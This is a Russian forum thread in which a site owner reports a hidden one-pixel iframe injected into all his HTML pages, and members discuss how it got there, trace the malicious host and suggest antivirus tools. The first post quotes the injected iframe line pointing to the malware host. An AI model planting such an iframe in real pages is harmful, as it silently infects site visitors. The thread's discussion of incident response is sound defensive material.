Хакерская атака

[Alexey Shadrin]

Добрый день, господа!
Сегодня утром в 8.17 мин по Москве во все html-страницы моего сайта была вписана вот такая строчка:

<iframe src="http://xmanages.cn/in/" width=1 height=1 style="visibility: hidden"></iframe>

Кем и как пока остается загадкой. В результате при попытке открытия страниц сайта компьютер подвергся вирусной атаке, но защита сработала.
В 14 час о ситуации мне сообщил товарищ и я полностью заменил содержимое сайта из резерва.
Вопрос:
1. Как такое могло произойти?
2. Что это? - целенаправленное действие или случайность?
Спасибо.

 

[Samsonov]

Ответ: Хакерская атака

Как такое могло произойти?

Cпросите у своего хостера — ему лучше видно по логам веб-сервера, какие запросы производились в то время. То, что у вас на сайте нет [дырявой] системы управления контентом, ещё не значит, что её нет ни на одном другом сайте, обслуживаемом тем же сервером. Да мало ли, где дырки бывают: например, в системе просмотра статистики посещаемости — так один раз хакнули phpbb.com, хотя владельцы сайта давно предупреждали своего хостера о необходимости обновить AWStats. Даже любой стандартный сканер безопасности знает десятки и сотни «типичных URL», на которые традиционно любят сажать дырявые программы. Не говоря уже о ежедневно обнаруживаемых новых угрозах.

Вы точно уверены, что никто из тех, кто знает пароль от FTP-доступа, не заражён вирусом? Ведь некоторые вирусы как раз тем и занимаются, что ищут в системе пароли от сайтов и выкладывают туда всякую дрянь.

Что это? Целенаправленное действие или случайность?

Ни в коем случае не случайность, но результат осмысленного деяния. Другое дело, что деяние скорее всего было автоматическим (не ручным) и не имело личной направленности конкретно на ваш сайт.

 

[Alexey Shadrin]

Ответ: Хакерская атака

Вы точно уверены, что никто из тех, кто знает пароль от FTP-доступа, не заражён вирусом?

Ну, откуда же мне быть уверенным. Хотя я знаю, что эти люди давно не заходили ко мне на ftp. Очень давно.
Однако спасибо!

 

[JAW]

Ответ: Хакерская атака

Алексей...
Я не знаю, что нонче с хостером, но есть некоторое подозрение, что обращение к нему может вызвать вопросы по поводу вообще этого домена (в смысле rudtp.ru), посему сперва стоит посоветоваться далеко не с хостером.

Атаки подобного рода обычно ищут дырки в системе безопасности.
В частности Вы пользуетесь стандартными движками, причём довольно распространёнными, в частности, галерея однозначно дырявая, просто из за распространённости движка.
Эти JavaScript ссылки на всплывающих окнах тоже вызывают вопрос по дыркам.

Самая лучшая защита, это нападение... Поскольку сайт не очень уж посещаемый, то может быть стоит заняться ежедневной верификацией? Скорее всего достаточно размера файла и даты.

P.S. Кстати, я не понял, shadrin.prodtp.ru тоже существует?
Случайно набрал и ресолвился IP адрес.

 

[Alexey Shadrin]

Ответ: Хакерская атака

Смотрите-ка, ребята -- аттач. Я рискнул и прошел по ссылке. Вновь сработала защита.
А ведь это, судя по всему, гугловский сервер...
Не перекликается ли эта хрень с тем, что у меня несколько дней кряду глючил поисковый модуль Google AJAX API, коды котрого прописаны на каждой странице? А еще ведь у меня коды Google Analytics (счетчик)...

 

[JAW]

Ответ: Хакерская атака

Ну, откуда же мне быть уверенным. Хотя я знаю, что эти люди давно не заходили ко мне на ftp.

Сменить пароль и логин.

И проверить, на всякий случай, свой компьютер на вирусы.
Хотя последнее время не очень помогает, бывают целенаправленные атаки на распространение конкретной заразы, которые антивирусы не ловят.

 

[Alexey Shadrin]

Ответ: Хакерская атака

Я не знаю, что нонче с хостером, но есть некоторое подозрение, что обращение к нему может вызвать вопросы по поводу вообще этого домена (в смысле rudtp.ru), посему сперва стоит посоветоваться далеко не с хостером.

Что за туманные намеки, говорите прямо!

Поскольку сайт не очень уж посещаемый, то может быть стоит заняться ежедневной верификацией?

А как Вы можете судить о его посещаемости? У Вас стоит тайный счетчик?

P.S. Кстати, я не понял, shadrin.prodtp.ru тоже существует?
Случайно набрал и ресолвился IP адрес.

Понятия не имею. Я такого не делал.

 

[JAW]

Ответ: Хакерская атака

Сегодня у меня Gmail жёстко глючил в фаерфоксе.

P.S. Уже на "ты" Снеси этот глючный NAV к чертям...
NOD32 гораздо адекватней... И следи за косвенными проявлениями (необъяснимый трафик, неадекватное поведение компьютера).
Поставь TrafficInspector, он для 3-х пользователей бесплатен и тут у нас бухгалтерию заблокировал по поводу вероятности вируса, хотя визуально проблем небыло заметно. А вирусня таки нашлась.

 

[Alexey Shadrin]

Ответ: Хакерская атака

И проверить, на всякий случай, свой компьютер на вирусы.

Полный скан компьютера на вирусы проходит каждую ночь двумя системами (Norton Internet Security 2008 и AdAware Plus 2008). Вирусов вроде бы нет.

 

[Alexey Shadrin]

Ответ: Хакерская атака

P.S. Уже на "ты"

На брудершафт мы не пили. Извините, но только на Вы.

 

[Alexey Shadrin]

Ответ: Хакерская атака

Снеси этот глючный NAV к чертям...

С какой стати? Во-первых, он не глючный; во-вторых честно защищает машины много лет (в отличие от хваленого NOD, который на моих глазах пропускал вирусы -- множество раз я приносил на флешке вирусы с машин, "защищенных" NOD-ом и НИКОГДА с NAV); в-третьих, давайте по делу.

 

[JAW]

Ответ: Хакерская атака

Алексей... Это уже переход на уровень "жёстких разборок".
Я не могу обращаться на "Вы" в таком режиме.

При чём здесь гугл?
Трассировка маршрута на
59.125.229.78

Показала что маршут грустный и медленный уходит куда-то в пределы штатов на сеть hinet.net, потом благополучно дохнет.
Запрос по этому адресу по 80 порту показал, что Апач там таки стоит, но дохлый.

И я пошёл по адресу приведённому по адресу в первом посте.
FireFox хрюкнул и вывалился с концами, похоже пережить не смог

Насчёт вирусов... Есть утилитка AVZ. Она бесплатная. Стоит посмотреть, не грузится ли чего странного в автозагрузке и не висит ли чего странного в памяти.
AVZ подсвечивает зёлёным известное ей, чёрным то, чего она не знает (с этим стоит разобраться) и красным предполагаемые угрозы.

Вот предполагаемые угрозы стои честно и аккуратно переписать на бумажку, найти те файлы и поискать в сети... Лучше не удалять, пока не будет понятно что это... (потом концы будет трудно найти)

В общем я вирусы обычно руками чищу... Антивирусы в том числе самые лучшие, с новейшими базами не справляются... Только блокируют, а если уже... То могут недочистить.

Сейчас время, когда любой полудурок может собрать вредоносный код при помощи специальных конструкторов, которые стоят весьма символических денег.

 

[TRANTOR]

Ответ: Хакерская атака

А ведь это, судя по всему, гугловский сервер...

Судя по чему?

К Гуглу оно никакого отношения не имеет:

59.125.229.71
xmanages.cn
Хост недоступен

59.125.229.64 - 59.125.229.95

Yi Fong Mantel Industry Ltd.
Changhua County County Taiwan

Wei Chen Jheng
Yi Fong Mantel Industry Ltd.
Changhua County County Taiwan
hn72054396@hn.hinet.net

Wei Chen Jheng
Yi Fong Mantel Industry Ltd.
Changhua County County Taiwan
hn72054396@hn.hinet.net

YI-FONG-MANTEL-I-CY-TW
Обновлен: 21-Jun-2007 by fkchung@ms1.hinet.net
Источник: whois.apnic.net


59.125.229.78
59-125-229-78.HINET-IP.hinet.net
Хост недоступен

59.125.229.64 - 59.125.229.95

Yi Fong Mantel Industry Ltd.
Changhua County County Taiwan

Wei Chen Jheng
Yi Fong Mantel Industry Ltd.
Changhua County County Taiwan
hn72054396@hn.hinet.net

Wei Chen Jheng
Yi Fong Mantel Industry Ltd.
Changhua County County Taiwan
hn72054396@hn.hinet.net

YI-FONG-MANTEL-I-CY-TW
Обновлен: 21-Jun-2007 by fkchung@ms1.hinet.net
Источник: whois.apnic.net

И, насколько я вижу из скриншота, некая ответная часть уже есть на Вашем компе (могу, однако, ошибаться насчет этого) и пытается на этот адрес ломиться. Рекомендую провирить комп еще каким-нить антивирусом.

 

[JAW]

Ответ: Хакерская атака

Другой способ понять что "поймали", это каким файловым менеджером в котором разрешено просматривать скрытые и защищённые файлы глянуть с сортировкой по дате файлики в Windows\, Windows\system32\, Windows\system32\drivers

Ничего странного последнее время там не появлялось?
Появлялось? Опять таки на бумажку и в поиск.

Кстати, где искать в первую очередь упоминание о файлах есть в Abaut того самого AVZ.

Только прежде, чем задавать вопросы на тех форумах стоит почитать правила и выполнить предложенную там процедуру.

P.S. Очень надеюсь, что не Вы сами оказались источником атаки... Но таки стоит подстраховаться.

По антивирусам. 3-я версия NOD работает очень не плохо. Насчёт AVAST и Adware у меня есть сомнения. Есть бесплатный сканер от drWEB, но им аккуратно, только в режиме сканирования, но не лечения. Он мне пару раз систему завалил.

 

[Alexey Shadrin]

Ответ: Хакерская атака

И, насколько я вижу из скриншота, некая ответная часть уже есть на Вашем компе (могу, однако, ошибаться насчет этого) и пытается на этот адрес ломиться.

"Ответная часть" -- это я; я сам туда ломанулся6 чтобы спровоцировать работу фареволла и выложить скрин.

 

[TRANTOR]

Ответ: Хакерская атака

"Ответная часть" -- это я;

Вы можете сами сгенерировать нужные пакеты с указанного порта на данный IP и чтобы они идентифицировались, как атака? Сомневаюсь.

Ломится какой-то процесс. Какой именно - нужно смотреть в логах. Если это оказался новый, неизвестный процесс, то скорее всего он и есть кусок вируса. Если это системный процесс, то он уже, наверное, изменен вирусом. Если это IE, то он либо изменен вирусом, либо в его адресное пространство внедрена какая-нить DLL'ка.

Надо еще раз прошерстить все парочкой антивирусов. И хорошо, если их не будет, а это просто такая реакция NAV на попытку загрузки вируса самим браузером.

А эту ссылку из первого поста лучше всего убрать с глаз долой, чтобы никто туда не ходил.

 

[Alexey Shadrin]

Ответ: Хакерская атака

Вы можете сами сгенерировать нужные пакеты с указанного порта на данный IP и чтобы они идентифицировались, как атака? Сомневаюсь.

Да, нет же, ребята: я просто пошел по этой ссылке. Сразу же сработал NAV.
И ровно то же самое произошло, когда мой приятель сегодня утром зашел на мой сайт -- у него так же сразу сработала защита.
Я полез смотреть, что произошло и обнаружил, что во всех htm-файлах внизу появилась вот эта строчка. Только этой строчкой странички и отличались от оригинальных.
Я прошел по ссылке и защита сработала.
Вот и все.

Мне непонятно, как удалось запихнуть эту строчку в htm-файлы, если даже для владельца на них стоят лишь два атрибута: "read" и "execute". "Write" снят! При этом, разумеется, в резервных копиях файлов сайта, которые хранятся у меня на машине, этой строчки нет и в помине. Я спокойно заменил ими испорченные и проблема ушла. Но мне интересно, чья это была воля?

 

[TRANTOR]

Ответ: Хакерская атака

Но мне интересно, чья это была воля?

Хакер заломал хостера (или что-то в этом духе), заделал шелл, а уже скрипт прописал во всех html'ках это дело. Естессно, что следы были заметены и файлы, как бы, те же самые остались.

 

[Alexey Shadrin]

Ответ: Хакерская атака

Хакер заломал хостера (или что-то в этом духе)

Скажите, пожалуйста, хакеры это делают от безделья, ради спортивного интереса, от детских комплексов, или им кто-то платит?

 

[JAW]

Ответ: Хакерская атака

Как так заметены?
Дата модификации, ладно поверю...
Но размер, это сомневаюсь, слишком много нужно мозга приложить.

Вообще атака довольно стандартная. Задача - построить BotNet, т.е. заразить вирусами о которых никто не подозревает достаточное количество пользователей с тем, чтобы по команде активизировать их на какое-то проплаченное дело.

DDOS атаки, спамовые рассылки, атаку других сетей.